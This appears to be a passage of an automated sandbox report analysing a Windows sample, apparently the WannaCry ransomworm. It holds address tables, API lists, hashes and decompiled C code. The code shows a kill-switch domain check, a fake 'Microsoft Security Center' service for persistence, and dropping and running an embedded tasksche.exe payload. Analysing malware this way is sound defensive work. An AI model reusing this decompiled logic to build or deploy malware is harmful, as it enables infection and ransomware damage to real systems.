                                                            0x00409aa3
                                                            0x00409aa8
                                                            0x00409ab2
                                                            0x00409acb
                                                            0x00409ad1
                                                            0x00409ad6
                                                            0x00409adb
                                                            0x00409ae8
                                                            0x00409aea
                                                            0x00409af0
                                                            0x00409b2c
                                                            0x00409b31
                                                            0x00409b32
                                                            0x00409b32
                                                            0x00409af2
                                                            0x00409af2
                                                            0x00409af2
                                                            0x00409af3
                                                            0x00409af6
                                                            0x00409af8
                                                            0x00409b03
                                                            0x00409b05
                                                            0x00409b05
                                                            0x00409b06
                                                            0x00409b06
                                                            0x00409b03
                                                            0x00409b09
                                                            0x00409b0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00409b13
                                                            0x00409b1a
                                                            0x00409b24
                                                            0x00409b39
                                                            0x00409b26
                                                            0x00409b26
                                                            0x00409b26
                                                            0x00409b3a
                                                            0x00409b3b
                                                            0x00409b3c
                                                            0x00409b44
                                                            0x00409b45
                                                            0x00409b4a
                                                            0x00409b4e
                                                            0x00409b54
                                                            0x00409b59
                                                            0x00409b5b
                                                            0x00409b5e
                                                            0x00409b5f
                                                            0x00409b60
                                                            0x00409b67

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                            • String ID:
                                                            • API String ID: 801014965-0
                                                            • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                            • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                            • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                            • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00408140() {
                                                            				char* _v1;
                                                            				char* _v3;
                                                            				char* _v7;
                                                            				char* _v11;
                                                            				char* _v15;
                                                            				char* _v19;
                                                            				char* _v23;
                                                            				void _v80;
                                                            				char _v100;
                                                            				char* _t12;
                                                            				void* _t13;
                                                            				void* _t27;
                                                            
                                                            				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                                                            				asm("movsb");
                                                            				_v23 = _t12;
                                                            				_v19 = _t12;
                                                            				_v15 = _t12;
                                                            				_v11 = _t12;
                                                            				_v7 = _t12;
                                                            				_v3 = _t12;
                                                            				_v1 = _t12;
                                                            				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                            				_t27 = _t13;
                                                            				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                            				_push(_t27);
                                                            				InternetCloseHandle(); // executed
                                                            				InternetCloseHandle(0);
                                                            				E00408090();
                                                            				return 0;
                                                            			}















                                                            0x00408155
                                                            0x00408157
                                                            0x00408158
                                                            0x0040815c
                                                            0x00408160
                                                            0x00408164
                                                            0x00408168
                                                            0x0040816c
                                                            0x00408177
                                                            0x0040817b
                                                            0x0040818e
                                                            0x00408194
                                                            0x0040819c
                                                            0x004081a7
                                                            0x004081ab
                                                            0x004081ad
                                                            0x004081b9

                                                            APIs
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                            • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                            • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                              • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                              • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                            Strings
                                                            • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                            • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                            • API String ID: 774561529-2942426231
                                                            • Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                            • Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
                                                            • Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                            • Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00407C40() {
                                                            				char _v260;
                                                            				void* _t15;
                                                            				void* _t17;
                                                            
                                                            				sprintf( &_v260, "%s -m security", 0x70f760);
                                                            				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                                                            				if(_t15 == 0) {
                                                            					return 0;
                                                            				} else {
                                                            					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                                                            					if(_t17 != 0) {
                                                            						StartServiceA(_t17, 0, 0);
                                                            						CloseServiceHandle(_t17);
                                                            					}
                                                            					CloseServiceHandle(_t15);
                                                            					return 0;
                                                            				}
                                                            			}






                                                            0x00407c56
                                                            0x00407c6e
                                                            0x00407c72
                                                            0x00407cd3
                                                            0x00407c74
                                                            0x00407ca7
                                                            0x00407cab
                                                            0x00407cb2
                                                            0x00407cb9
                                                            0x00407cb9
                                                            0x00407cbc
                                                            0x00407cc9
                                                            0x00407cc9

                                                            APIs
                                                            • sprintf.MSVCRT ref: 00407C56
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                            • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F56FB10,00000000), ref: 00407C9B
                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                            • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                            • API String ID: 3340711343-4063779371
                                                            • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                            • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                            • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                            • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E00407CE0() {
                                                            				void _v259;
                                                            				char _v260;
                                                            				void _v519;
                                                            				char _v520;
                                                            				char _v572;
                                                            				short _v592;
                                                            				intOrPtr _v596;
                                                            				void* _v608;
                                                            				void _v636;
                                                            				char _v640;
                                                            				intOrPtr _v644;
                                                            				intOrPtr _v648;
                                                            				intOrPtr _v652;
                                                            				char _v656;
                                                            				intOrPtr _v692;
                                                            				intOrPtr _v700;
                                                            				_Unknown_base(*)()* _t36;
                                                            				void* _t38;
                                                            				void* _t39;
                                                            				intOrPtr _t64;
                                                            				struct HINSTANCE__* _t104;
                                                            				struct HRSRC__* _t105;
                                                            				void* _t107;
                                                            				void* _t108;
                                                            				long _t109;
                                                            				intOrPtr _t121;
                                                            				intOrPtr _t122;
                                                            
                                                            				_t104 = GetModuleHandleW(L"kernel32.dll");
                                                            				if(_t104 != 0) {
                                                            					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                                                            					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                                                            					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                                                            					_t36 = GetProcAddress(_t104, "CloseHandle");
                                                            					_t64 =  *0x431478; // 0x0
                                                            					 *0x43144c = _t36;
                                                            					if(_t64 != 0) {
                                                            						_t121 =  *0x431458; // 0x0
                                                            						if(_t121 != 0) {
                                                            							_t122 =  *0x431460; // 0x0
                                                            							if(_t122 != 0 && _t36 != 0) {
                                                            								_t105 = FindResourceA(0, 0x727, "R");
                                                            								if(_t105 != 0) {
                                                            									_t38 = LoadResource(0, _t105);
                                                            									if(_t38 != 0) {
                                                            										_t39 = LockResource(_t38);
                                                            										_v608 = _t39;
                                                            										if(_t39 != 0) {
                                                            											_t109 = SizeofResource(0, _t105);
                                                            											if(_t109 != 0) {
                                                            												_v520 = 0;
                                                            												memset( &_v519, 0, 0x40 << 2);
                                                            												asm("stosw");
                                                            												asm("stosb");
                                                            												_v260 = 0;
                                                            												memset( &_v259, 0, 0x40 << 2);
                                                            												asm("stosw");
                                                            												asm("stosb");
                                                            												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                                                            												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                                                            												MoveFileExA( &_v520,  &_v260, 1);
                                                            												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
                                                            												if(_t107 != 0xffffffff) {
                                                            													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
                                                            													 *0x43144c(_t107);
                                                            													_v652 = 0;
                                                            													_v648 = 0;
                                                            													_v644 = 0;
                                                            													memset( &_v636, 0, 0x10 << 2);
                                                            													asm("repne scasb");
                                                            													_v656 = 0;
                                                            													_t108 = " /i";
                                                            													asm("repne scasb");
                                                            													memcpy( &_v572 - 1, _t108, 0 << 2);
                                                            													_push( &_v656);
                                                            													memcpy(_t108 + 0x175b75a, _t108, 0);
                                                            													_push( &_v640);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0x8000000);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push( &_v572);
                                                            													_push(0);
                                                            													_v640 = 0x44;
                                                            													_v592 = 0;
                                                            													_v596 = 0x81;
                                                            													if( *0x431478() != 0) {
                                                            														 *0x43144c(_v692);
                                                            														 *0x43144c(_v700);
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return 0;
                                                            			}






























                                                            0x00407cf5
                                                            0x00407cfb
                                                            0x00407d15
                                                            0x00407d22
                                                            0x00407d2f
                                                            0x00407d34
                                                            0x00407d36
                                                            0x00407d3c
                                                            0x00407d43
                                                            0x00407d49
                                                            0x00407d4f
                                                            0x00407d55
                                                            0x00407d5b
                                                            0x00407d7a
                                                            0x00407d7e
                                                            0x00407d86
                                                            0x00407d8e
                                                            0x00407d95
                                                            0x00407d9d
                                                            0x00407da1
                                                            0x00407daf
                                                            0x00407db3
                                                            0x00407dc4
                                                            0x00407dc8
                                                            0x00407dca
                                                            0x00407dcc
                                                            0x00407ddb
                                                            0x00407de2
                                                            0x00407def
                                                            0x00407df1
                                                            0x00407e01
                                                            0x00407e18
                                                            0x00407e2c
                                                            0x00407e49
                                                            0x00407e4e
                                                            0x00407e61
                                                            0x00407e68
                                                            0x00407e72
                                                            0x00407e7a
                                                            0x00407e82
                                                            0x00407e8b
                                                            0x00407e95
                                                            0x00407e9b
                                                            0x00407e9f
                                                            0x00407ea8
                                                            0x00407eb0
                                                            0x00407ebb
                                                            0x00407ebc
                                                            0x00407ec6
                                                            0x00407ec7
                                                            0x00407ec8
                                                            0x00407ec9
                                                            0x00407ece
                                                            0x00407ecf
                                                            0x00407ed0
                                                            0x00407ed1
                                                            0x00407ed2
                                                            0x00407ed3
                                                            0x00407edb
                                                            0x00407ee0
                                                            0x00407ef0
                                                            0x00407ef7
                                                            0x00407f02
                                                            0x00407f02
                                                            0x00407ef0
                                                            0x00407e4e
                                                            0x00407db3
                                                            0x00407da1
                                                            0x00407d8e
                                                            0x00407d7e
                                                            0x00407d5b
                                                            0x00407d4f
                                                            0x00407d43
                                                            0x00407f14

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F56FB10,?,00000000), ref: 00407CEF
                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                            • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                            • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                            • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                            • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                            • sprintf.MSVCRT ref: 00407E01
                                                            • sprintf.MSVCRT ref: 00407E18
                                                            • MoveFileExA.KERNEL32 ref: 00407E2C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
                                                            • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                            • API String ID: 4072214828-1507730452
                                                            • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                            • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                            • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                            • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
                                                            				signed int _v5;
                                                            				signed char _v10;
                                                            				char _v11;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				intOrPtr* _v24;
                                                            				struct _FILETIME _v32;
                                                            				struct _FILETIME _v40;
                                                            				char _v44;
                                                            				unsigned int _v72;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				unsigned int _v108;
                                                            				unsigned int _v124;
                                                            				char _v384;
                                                            				char _v644;
                                                            				char _t142;
                                                            				char _t150;
                                                            				void* _t151;
                                                            				signed char _t156;
                                                            				long _t173;
                                                            				signed char _t185;
                                                            				signed char* _t190;
                                                            				signed char* _t194;
                                                            				intOrPtr* _t204;
                                                            				signed int _t207;
                                                            				signed int _t208;
                                                            				intOrPtr* _t209;
                                                            				unsigned int _t210;
                                                            				char _t212;
                                                            				signed char _t230;
                                                            				signed int _t234;
                                                            				signed char _t238;
                                                            				void* _t263;
                                                            				unsigned int _t264;
                                                            				signed int _t269;
                                                            				signed int _t270;
                                                            				signed int _t271;
                                                            				intOrPtr _t272;
                                                            				char* _t274;
                                                            				unsigned int _t276;
                                                            				signed int _t277;
                                                            				void* _t278;
                                                            				intOrPtr* _t280;
                                                            				void* _t281;
                                                            				intOrPtr _t282;
                                                            
                                                            				_t263 = __edx;
                                                            				_t213 = __ecx;
                                                            				_t272 = _a4;
                                                            				_t208 = _t207 | 0xffffffff;
                                                            				_t280 = __ecx;
                                                            				_v24 = __ecx;
                                                            				if(_t272 < _t208) {
                                                            					L61:
                                                            					return 0x10000;
                                                            				}
                                                            				_t131 =  *__ecx;
                                                            				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                            					goto L61;
                                                            				}
                                                            				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
                                                            					E00406A97(_t131);
                                                            					_pop(_t213);
                                                            				}
                                                            				 *(_t280 + 4) = _t208;
                                                            				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
                                                            					if(_t272 != _t208) {
                                                            						_t132 =  *_t280;
                                                            						if(_t272 >=  *( *_t280 + 0x10)) {
                                                            							L12:
                                                            							_t133 =  *_t280;
                                                            							if( *( *_t280 + 0x10) >= _t272) {
                                                            								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
                                                            								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
                                                            									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
                                                            									if(_t142 != 0) {
                                                            										L19:
                                                            										return 0x800;
                                                            									}
                                                            									_push(_v16);
                                                            									L00407700();
                                                            									_v12 = _t142;
                                                            									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
                                                            										_t281 = _a8;
                                                            										 *_t281 =  *( *_t280 + 0x10);
                                                            										strcpy( &_v644,  &_v384);
                                                            										_t209 = __imp___mbsstr;
                                                            										_t274 =  &_v644;
                                                            										while(1) {
                                                            											L21:
                                                            											_t150 =  *_t274;
                                                            											if(_t150 != 0 && _t274[1] == 0x3a) {
                                                            												break;
                                                            											}
                                                            											if(_t150 == 0x5c || _t150 == 0x2f) {
                                                            												_t274 =  &(_t274[1]);
                                                            												continue;
                                                            											} else {
                                                            												_t151 =  *_t209(_t274, "\\..\\");
                                                            												if(_t151 != 0) {
                                                            													L31:
                                                            													_t39 = _t151 + 4; // 0x4
                                                            													_t274 = _t39;
                                                            													continue;
                                                            												}
                                                            												_t151 =  *_t209(_t274, "\\../");
                                                            												if(_t151 != 0) {
                                                            													goto L31;
                                                            												}
                                                            												_t151 =  *_t209(_t274, "/../");
                                                            												if(_t151 != 0) {
                                                            													goto L31;
                                                            												}
                                                            												_t151 =  *_t209(_t274, "/..\\");
                                                            												if(_t151 == 0) {
                                                            													strcpy(_t281 + 4, _t274);
                                                            													_t264 = _v72;
                                                            													_a11 = _a11 & 0x00000000;
                                                            													_v5 = _v5 & 0x00000000;
                                                            													_t156 = _t264 >> 0x0000001e & 0x00000001;
                                                            													_t230 =  !(_t264 >> 0x17) & 0x00000001;
                                                            													_t276 = _v124 >> 8;
                                                            													_t210 = 1;
                                                            													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
                                                            														_a11 = _t264 >> 0x00000001 & 0x00000001;
                                                            														_t230 = _t264 & 0x00000001;
                                                            														_v5 = _t264 >> 0x00000002 & 0x00000001;
                                                            														_t156 = _t264 >> 0x00000004 & 0x00000001;
                                                            														_t264 = _t264 >> 0x00000005 & 0x00000001;
                                                            														_t210 = _t264;
                                                            													}
                                                            													_t277 = 0;
                                                            													 *(_t281 + 0x108) = 0;
                                                            													if(_t156 != 0) {
                                                            														 *(_t281 + 0x108) = 0x10;
                                                            													}
                                                            													if(_t210 != 0) {
                                                            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
                                                            													}
                                                            													if(_a11 != 0) {
                                                            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
                                                            													}
                                                            													if(_t230 != 0) {
                                                            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
                                                            													}
                                                            													if(_v5 != 0) {
                                                            														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
                                                            													}
                                                            													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
                                                            													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
                                                            													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
                                                            													_v40.dwHighDateTime = _t264;
                                                            													LocalFileTimeToFileTime( &_v40,  &_v32);
                                                            													_t173 = _v32.dwLowDateTime;
                                                            													_t234 = _v32.dwHighDateTime;
                                                            													_t212 = _v12;
                                                            													 *(_t281 + 0x10c) = _t173;
                                                            													 *(_t281 + 0x114) = _t173;
                                                            													 *(_t281 + 0x11c) = _t173;
                                                            													 *(_t281 + 0x110) = _t234;
                                                            													 *(_t281 + 0x118) = _t234;
                                                            													 *(_t281 + 0x120) = _t234;
                                                            													if(_v16 <= 4) {
                                                            														L57:
                                                            														if(_t212 != 0) {
                                                            															_push(_t212);
                                                            															L004076E8();
                                                            														}
                                                            														_t282 = _v24;
                                                            														memcpy(_t282 + 8, _t281, 0x12c);
                                                            														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
                                                            														goto L60;
                                                            													} else {
                                                            														while(1) {
                                                            															_v12 =  *((intOrPtr*)(_t277 + _t212));
                                                            															_v10 = _v10 & 0x00000000;
                                                            															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
                                                            															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
                                                            															if(strcmp( &_v12, "UT") == 0) {
                                                            																break;
                                                            															}
                                                            															_t277 = _t277 + _a8 + 4;
                                                            															if(_t277 + 4 < _v16) {
                                                            																continue;
                                                            															}
                                                            															goto L57;
                                                            														}
                                                            														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
                                                            														_t185 = _t238 >> 0x00000001 & 0x00000001;
                                                            														_t278 = _t277 + 5;
                                                            														_a11 = _t185;
                                                            														_v5 = _t238 >> 0x00000002 & 0x00000001;
                                                            														if((_t238 & 0x00000001) != 0) {
                                                            															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                            															_t194 = _t278 + _t212;
                                                            															_t278 = _t278 + 4;
                                                            															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
                                                            															_t185 = _a11;
                                                            															 *(_t281 + 0x120) = _t271;
                                                            														}
                                                            														if(_t185 != 0) {
                                                            															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                            															_t190 = _t278 + _t212;
                                                            															_t278 = _t278 + 4;
                                                            															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
                                                            															 *(_t281 + 0x110) = _t270;
                                                            														}
                                                            														if(_v5 != 0) {
                                                            															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                            															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
                                                            															 *(_t281 + 0x118) = _t269;
                                                            														}
                                                            														goto L57;
                                                            													}
                                                            												}
                                                            												goto L31;
                                                            											}
                                                            										}
                                                            										_t274 =  &(_t274[2]);
                                                            										goto L21;
                                                            									}
                                                            									_push(_v12);
                                                            									L004076E8();
                                                            									goto L19;
                                                            								}
                                                            								return 0x700;
                                                            							}
                                                            							E00406520(_t133);
                                                            							L11:
                                                            							_pop(_t213);
                                                            							goto L12;
                                                            						}
                                                            						E004064E2(_t213, _t132);
                                                            						goto L11;
                                                            					}
                                                            					goto L8;
                                                            				} else {
                                                            					if(_t272 == _t208) {
                                                            						L8:
                                                            						_t204 = _a8;
                                                            						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
                                                            						 *((char*)(_t204 + 4)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x108)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x110)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x114)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x118)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x120)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x124)) = 0;
                                                            						 *((intOrPtr*)(_t204 + 0x128)) = 0;
                                                            						L60:
                                                            						return 0;
                                                            					}
                                                            					memcpy(_a8, _t280 + 8, 0x12c);
                                                            					goto L60;
                                                            				}
                                                            			}


















































                                                            0x00406c40
                                                            0x00406c40
                                                            0x00406c4c
                                                            0x00406c4f
                                                            0x00406c52
                                                            0x00406c56
                                                            0x00406c59
                                                            0x00407064
                                                            0x00000000
                                                            0x00407064
                                                            0x00406c5f
                                                            0x00406c64
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c6d
                                                            0x00406c70
                                                            0x00406c75
                                                            0x00406c75
                                                            0x00406c7c
                                                            0x00406c7f
                                                            0x00406ca0
                                                            0x00406cec
                                                            0x00406cf1
                                                            0x00406cfa
                                                            0x00406cfa
                                                            0x00406cff
                                                            0x00406d21
                                                            0x00406d3e
                                                            0x00406d52
                                                            0x00406d5c
                                                            0x00406d89
                                                            0x00000000
                                                            0x00406d89
                                                            0x00406d5e
                                                            0x00406d61
                                                            0x00406d68
                                                            0x00406d7e
                                                            0x00406d95
                                                            0x00406d9b
                                                            0x00406dab
                                                            0x00406db0
                                                            0x00406db8
                                                            0x00406dbe
                                                            0x00406dbe
                                                            0x00406dbe
                                                            0x00406dc2
                                                            0x00000000
                                                            0x00000000
                                                            0x00406dd0
                                                            0x00406dd6
                                                            0x00000000
                                                            0x00406dd9
                                                            0x00406ddf
                                                            0x00406de5
                                                            0x00406e11
                                                            0x00406e11
                                                            0x00406e11
                                                            0x00000000
                                                            0x00406e11
                                                            0x00406ded
                                                            0x00406df3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406dfb
                                                            0x00406e01
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e09
                                                            0x00406e0f
                                                            0x00406e1b
